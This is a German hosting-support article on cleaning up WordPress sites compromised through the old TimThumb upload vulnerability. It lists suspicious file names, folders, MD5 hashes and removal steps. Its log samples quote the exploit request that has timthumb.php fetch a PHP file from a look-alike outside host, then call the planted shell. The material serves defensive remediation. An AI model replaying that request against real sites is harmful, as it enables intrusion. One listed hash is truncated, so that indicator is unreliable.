WordPress-Gefährdung: TimThumb

Das TimThumb-Tool wird von WordPress-Themas und -Plugins zum Anpassen der Bildgröße verwendet. Ältere Versionen von TimThumb enthalten eine Sicherheitslücke, die es Angreifern ermöglicht, bösartige (schädliche) Dateien von einer anderen Website hochzuladen. Über die erste schädliche Datei kann der Angreifer dann weitere bösartige Dateien in das Hosting-Konto hochladen.

Weitere Informationen zu Gefährdungen sowie zum Umgang mit ihnen finden Sie unter Was, wenn meine Website gehackt wurde?.

Anzeichen für eine Gefährdung

Neben den in Was, wenn meine Website gehackt wurde? erwähnten Anzeichen können Sie auch erkennen, dass Ihre Site von dieser speziellen Gefährdung betroffen ist, wenn Ihr Konto Dateien mit folgenden Mustern in einem Plugin-Verzeichnis enthält:

  • external_[MD5-Hash].php (Beispiel: external_dc8e1cb5bf0392f054e59734fa15469b.php)
  • [MD5-Hash].php (Beispiel: 7eebe45bde5168488ac4010f0d65cea8.php)

Beispiele für mögliche MD5-Hashes finden Sie in diesem Artikel im Abschnitt MD5-Summen bekannter bösartiger Dateien.

Unter Umständen finden Sie auch folgende Dateien im Root-Verzeichnis Ihrer Website (weitere Informationen):

  • x.txt
  • logx.txt

Abhilfe

Entfernen Sie alle gefährdeten und schädlichen Dateien. Vor dem Löschen von Elementen sollten Sie eine Sicherung Ihrer Website erstellen (weitere Informationen).

Suchen nach schädlichen Dateien

Die schädlichen Dateien, die über die Sicherheitslücke von TimThumb hochgeladen werden, befinden sich üblicherweise in einem der folgenden Unterverzeichnisse des Verzeichnisses /theme oder /plugin, das die anfällige TimThumb-Datei enthält:

  • /tmp
  • /cache
  • /images

Beispiele für Speicherorte schädlicher Dateien:

[webroot]/wp-content/themes/[Thema mit anfälliger TimThumb-Datei]/cache/images/

Beispiele für Namen schädlicher Dateien an diesen Speicherorten:

  • ef881b33fba49bd6ad1818062d071a9c.php
  • db648d44074f33a8857066b97290d247.php
  • 3cf739debc9340540c923bbf3b73044b.php
  • dc33a2e36d3179a06278191088c2ef35.php
  • 8377cb73d30655dc2cbf906c9310da56.php
  • eb117b212e2906f52c0a0c9132c6c07a.php
  • a4924ec23939d2410354efbb8d4ddd06.php
  • vvv3.php
  • ea90e1e4d7ba30848f70b13d616c6ed4.php
  • 236268f2a06e4153365b998d13934eb9.php
  • 6a4fa516943e2fa09e3704486075de9f.php
  • 896c4eb4ff2581f6e623db1904b80a44.php
  • wp-images.php

Die Dateien x.txt und logx.txt enthalten Informationen dazu, wann eine schädliche Datei unter Verwendung der TimThumb-Sicherheitslücke erstellt und wo die schädliche Datei innerhalb des Hosting-Kontos gespeichert wurde. Anhand dieser Informationen können Sie ermitteln, welche Dateien entfernt werden müssen und wo sie sich befinden. Es ist allerdings nicht sehr wahrscheinlich, dass Sie hier eine vollständige Liste aller zu entfernenden Dateien finden.

Ein Beispiel:

Tag: Donnerstag, 11. April 2013, 06:21:15 -0700
IP: X.X.X.X
Browser: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
URL: /wp-content/themes/[Thema mit anfälliger TimThumb-Datei]/cache/images/2817f389ac8b52527a0c5e4aabb464aa.php?clone

Zu entfernende Dateien

Entfernen Sie folgende Dateien, nachdem Sie eine Sicherung Ihrer Site erstellt haben:

  • x.txt
  • logx.txt
  • external_[MD5-Hash].php (Beispiel: external_dc8e1cb5bf0392f054e59734fa15469b.php)
  • [MD5-Hash].php (Beispiel: 7eebe45bde5168488ac4010f0d65cea8.php)
  • Weitere bösartige PHP-Dateien, die Sie mit den MD5-Hash-Dateinamen finden

Hierzu können Sie FTP (weitere Informationen) oder den Dateimanager in der Systemsteuerung für Ihr Hosting-Konto (weitere Informationen) verwenden.

Außerdem sollten Sie folgende Schritte ausführen:

  • Aktualisieren Sie alle Ihre Themen und Plugins auf die neueste Version.
  • Ersetzen Sie sämtliche Instanzen von TimThumb.php durch die neueste Version.

Technische Informationen

HTTP-Protokollbeispiele

x.x.x.x - - [27/Apr/2014:08:04:22 -0700] "GET SampleSite.tld/wp-content/themes/[Thema mit anfälliger TimThumb-Datei]/framework/timthumb.php?src=http%3A%2F%2Fimg.youtube.com.bargainbookfinders.com%2Fsempak.php HTTP/1.1" 200 1018 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
x.x.x.x - - [27/Apr/2014:08:04:23 -0700] "GET SampleSite.tld/wp-content/themes/[Thema mit anfälliger TimThumb-Datei]/cache/images/896c4eb4ff2581f6e623db1904b80a44.php?clone HTTP/1.1" 200 13128 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
x.x.x.x - - [27/Apr/2014:08:04:26 -0700] "GET SampleSite.tld/wp-includes/wp-script.php HTTP/1.1" 404 36841 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
x.x.x.x - - [27/Apr/2014:08:04:28 -0700] "GET SampleSite.tld/wp-content/themes/[Thema mit anfälliger TimThumb-Datei]/cache/images/896c4eb4ff2581f6e623db1904b80a44.php HTTP/1.1" 200 13128 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
x.x.x.x - - [27/Apr/2014:08:04:30 -0700] "GET SampleSite.tld/wp-content/themes/[Thema mit anfälliger TimThumb-Datei]/cache/images/896c4eb4ff2581f6e623db1904b80a44.php HTTP/1.1" 200 13128 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"

MD5-Summen bekannter bösartiger Dateien

  • 2c4bcdc6bee98ed4dd55e0d35564d870
  • 10069c51da0c87ad904d602beb9e7770
  • 8855aecb5c45a5bfd962b4086c8ff96a
  • 526a4cf1f66f27a959a39019fdf1fae9
  • 161d2e53c664bd0fe1303017a145b413
  • 39f186a0f55b04c651cbff6756a64ccc
  • f67ca8f0bac08f5e8ccab6013b7acf70
  • 747c7afcda0eef0eff6ed6838494c32
  • cfdf59a58057b62f4707b909bcbd4577

Weitere bösartige Dateien

  • wp-script.php
  • wp-images.php
  • vvv3.php
  • data.php

War dieser Artikel hilfreich?
Vielen Dank für deine Vorschläge. Um mit einem Mitarbeiter unsere Kundenservice zu sprechen, nutze bitte die Telefonnummer des Support oder die Chat-Option oben.
Gern geschehen! Können wir sonst noch etwas für Sie tun?
Tut uns leid. Teile uns mit, was unklar war, und warum diese Lösung nicht zur Behebung des Problems geführt hat.